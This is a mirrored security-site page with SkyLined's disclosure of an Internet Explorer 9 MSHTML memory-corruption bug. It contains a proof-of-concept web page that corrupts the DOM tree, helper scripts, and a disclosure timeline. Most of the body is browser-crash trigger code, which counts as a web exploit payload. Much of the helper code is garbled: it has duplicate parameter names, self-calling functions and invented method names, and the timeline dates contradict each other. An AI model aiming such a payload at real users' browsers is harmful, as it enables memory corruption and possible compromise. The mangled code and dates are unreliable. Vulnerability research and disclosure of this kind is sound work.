首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Internet Explorer 9 MSHTML - CElement::HasFlag Memory Corruption
来源:http://blog.skylined.nl 作者:Skylined 发布时间:2016-12-12  
<!--
Source: http://blog.skylined.nl/20161209001.html
 
Synopsis
 
A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
 
Known affected software and attack vectors
 
Microsoft Internet Explorer 9
 
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java should prevent an attacker from triggering the vulnerable code path.
 
Details
 
This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. In addition, EIP said they were already aware of the bug and provided no details, this issue appears to have been fixed before ZDI was able to look at it. I have included a number of reports created using a predecessor of Bug below.
 
Repro.html:
-->
 
<html>
  <head>
    <script src="get.js"></script>
    <script src="show.html"></script>
    <script>
      // First tag can be any inline but must NOT be closed yet
      // Second tag can be anything that's not inline.
      // "text1" can be anything
      document.write('<s><br>text1');
      // The tree is in good shape.
      show("DOM Tree after first write", get(document.body));
      // At this point, it appears that MSIE is still waiting for the first tag from the first write to be closed.
      // Inserting a P tag using any of the "Justify*"-, "Indent"- or "Outdent"-exec will mess up the DOM tree,
      // specifically for the "Justify*"- and "Outdent"-exec:
      // - the S tag will partially become a child of the P tag:
      //      P.last == S (but P.child = [BR, text1])
      // - the P tag will partially become a child of the S tag:
      //      S.first == P and S.child = [P] (but S.last = text1)
      // - The P partially becomes a child of the BODY tag:
      //      BODY.last = P (but BODY.first = S and BODY.child = [S])
      // (The situation is similar for "Indent", but includes a BLOCKQUOTE element)
      document.exec('Select');
      document.exec('Justify');
      show("DOM Tree after outdent", get(document.body));
      // At this point, MSIE is not yet crashing. However, another write will corrupt memory:
      document.write('text2');
      // You will probably not see this popup. If you do, it will display an obviously corrupt DOM element tree.
      show("DOM Tree after write", get(document.body));
    </script>
  </head>
</html>
 
 
<!--
get.js:
 
function get(o, b) {
  function get(o) {
    return o ? (o.tag || o.node + ':"' + o.data + '"') : "null";
  }
  function get(o, o, o, o,
      s, s) {
    if (!o) return [s + "null"];
    var ao = o.child,
        s = s + get(o);
    try {
      if (o && o.parent != o)
          s += " (parent:" + get(o.parent) + ")";
    } catch (e) {
      s += " (parent error:" + e.message + ")";
    }
    try {
      if (o.previous != o) {
        s += " (previous:" + get(o.previous) + ")";
        o && ao.push(o.previous);
      }
    } catch (e) {
      s += " (previous error:" + e.message + ")";
    }
    try {
      if (o.next != o) {
        s += " (next:" + get(o.next) + ")";
        o && ao.push(o.next);
      }
    } catch (e) {
      s += " (next error:" + e.message + ")";
    }
    try {
      if (ao.length > 0 && o.first != ao.item(0)) {
        s += " (first:" + get(o.first) + ")";
        ao.push(o.first);
      }
    } catch (e) {
      s += " (first error:" + e.message + ")";
    }
    for (var i = 0; i < ao.length; i++) {
      if (ao[i] == o) {
        return [s + " => previously referenced!"];
      }
    }
    var s = null;
    try {
      if (ao.length > 0 && o.last != ao.item(ao.length - 1)) {
        s = s + "\u2514 last:" + get(o.last);
        ao.push(o.last);
      }
    } catch (e) {
      s = s + "\u2514 last error:" + e.message;
    }
    ao.push(o);
    var as = [s], o = null;
    for (var i = 0; i < ao.length; i++) {
      try {
        var o = ao.item(i)
      } catch (e) {
        as.push(s + (i == ao.length - 1 ? "\u255A" : "\u2560") + "child error:" + e.message);
        continue;
      }
      try {
        var o = i + 1 <= ao.length - 1 ? ao.item(i + 1) : null;
      } catch (e) {
        o = "error: " + e.message;
      }
      var as = get(o, o, o, o,
          s + (i == ao.length - 1 ? "\u255A" : "\u2560"),
          s + (i == ao.length - 1 ? (s ? "\u2502" : " ") : "\u2551"));
      o = o;
      for (j = 0; j < as.length; j++) {
        as.push(as[j]);
      }
    }
    if (s) {
      as.push(s);
    }
    return as;
  }
  var ao = [o], ao = []
  var as = [];
  find___:
  while(ao.length) {
    var o = ao.pop();
    for (var j = 0; j < ao.length; j++) {
      if (o == ao[j]) {
        continue find___;
      }
    }
    as = get(o, o.parent,
        o.previous, o.next,
        o.parent ? "\u255A" : "",
        o.parent ? " " : "");
    as.push(as.join("\r\n"));
    if (!b) break;
  }
  return as.join("\r\n");
}
 
 
show.html:
 
//<!--
  function show(s, s) {
    show("show.html", [s, "<pre>" + s + "</pre>"],
      "dialog:800px; dialog:600px; resizable:yes");
  }
/*-->
<script>
  document.body.inner = window.dialog[1];
  document.title = window.dialog[0];
</script>
<!-- */ // -->
 
Time-line
 
27 September 2012: This vulnerability was found through fuzzing.
7 November 2012: This vulnerability was submitted to EIP.
27 November 2012: This vulnerability was rejected by EIP.
28 November 2012: This vulnerability was submitted to ZDI.
Between December 2012 and February 2013: Microsoft addresses this vulnerability.
27 February 2012: This vulnerability was rejected by ZDI.
8 December 2016: Details of this vulnerability are released.
I would like to note that although ZDI did not acquire the vulnerability as it was patched before they could finish analysis, they did offer me ZDI reward points as a courtesy.
-->
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Internet Explorer 9
·OpenSSL 1.1.0a/1.1.0b - Denial
·Microsoft Internet Explorer 9
·10-Strike Network File Search
·OpenSSH 7.2 - Denial of Servic
·Serva 3.0.0 HTTP Server - Deni
·TP-LINK TD-W8951ND - Denial of
·Microsoft Internet Explorer 9
·Dual DHCP DNS Server 7.29 - De
·McAfee Virus Scan Enterprise f
·Windows 10 x86/x64 WLAN AutoCo
·Samsung Devices KNOX Extension
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved